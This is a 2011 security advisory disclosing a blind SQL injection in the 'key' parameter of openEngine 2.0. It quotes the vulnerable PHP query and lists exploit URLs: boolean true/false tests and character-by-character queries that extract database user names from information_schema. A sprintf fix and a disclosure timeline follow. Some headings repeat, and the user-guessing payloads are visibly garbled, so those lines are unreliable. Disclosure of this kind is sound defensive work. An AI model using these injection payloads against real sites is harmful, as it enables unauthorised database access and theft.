SSCHADV2011-026 - openEngine 2.0 'key' Blind SQL Injection vulnerability
Advisory: |
openEngine 2.0 ‘key’ Blind SQL Injection vulnerability
|
Advisory ID: | SSCHADV2011-026 |
Author: |
Stefan Schurtz
|
Affected Software: | Successfully tested on openEngine 2.0 100226 |
Vendor URL: | |
Vendor Status: | informed |
CVE-ID: | - |
======================
Vulnerability Description
======================
The ‘key’ parameter in openEngine 2.0 is prone to a Blind SQL Injection
Vulnerability Description
======================
The ‘key’ parameter in openEngine 2.0 is prone to a Blind SQL Injection
==============
Technical Details
==============
Technical Details
==============
# vul code in ‘openengine/cms/system/02_page/includes/admin.php’
$query = "SELECT * FROM ".$db_praefix."page WHERE (page_key = $page_key) AND (page_status <= ".$account_status.") $access";
|
==============
Exploit
==============
Exploit
==============
Database information
User: easy
Blind SQL Injection
User: easy
Blind SQL Injection
http://<target>/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR 1=2 -> "Sie möchten die Seite versenden."
http://<target>/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR 1=1 -> "Sie möchten die Seite Homepage (de) versenden."
|
User-Guessing
http://<target>/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR ORD,CHAR)) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),2,1)) = 101
http://<target>/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR ORD,CHAR)) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),3,1)) = 97
http://<target>/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR ORD,CHAR)) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),4,1)) = 115
http://<target>/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR ORD,CHAR)) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),5,1)) = 121
|
=====
Solution
=====
$query = sprintf("SELECT * FROM ".$db_praefix."page WHERE (page_key = %d) AND (page_status <= ".$account_status.") $access;",$page_key);
================
Disclosure Timeline
================
08-Oct-2011 – informed developers
08-Oct-2011 – release date of this security advisory
09-Oct-2011 – post on BugTraq
====
Credits
====
Vulnerability found and advisory written by Stefan Schurtz.
=======
References
=======
http://www.openengine.de/
Comments
Display comments as Linear | Threaded